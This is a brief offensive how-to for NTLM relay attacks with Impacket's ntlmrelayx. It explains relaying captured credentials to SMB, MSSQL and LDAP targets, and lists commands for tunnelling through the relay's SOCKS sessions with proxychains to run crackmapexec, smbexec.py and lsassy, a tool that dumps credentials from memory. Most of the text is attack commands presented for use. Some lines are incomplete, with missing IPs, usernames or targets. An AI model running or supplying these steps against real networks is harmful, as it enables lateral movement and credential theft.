This module performs the SMB Relay attacks originally discovered by cDc extended to many target protocols (SMB, MSSQL, LDAP, etc). It receives a list of targets and for every connection received it will choose the next target and try to relay the credentials. Also, if specified, it will first to try authenticate against the client connecting to us.
Type socks to see the opened socks sessions:
ntlmrelayx> socks
Edit proxychains to your ntlmrelayx IP:
/etc/proxychains.conf:
socks4
now you can relay traffic through the socks proxy e.g:
proxychains crackmapexec smb 10.1.0.73 -u <user> -p '' -d <domain>
proxychains smbexec.py -no-pass
proxychains lsassy 10.1.0.160 -u
ntlmrelayx.py -tf targets.txt -socks -smb2support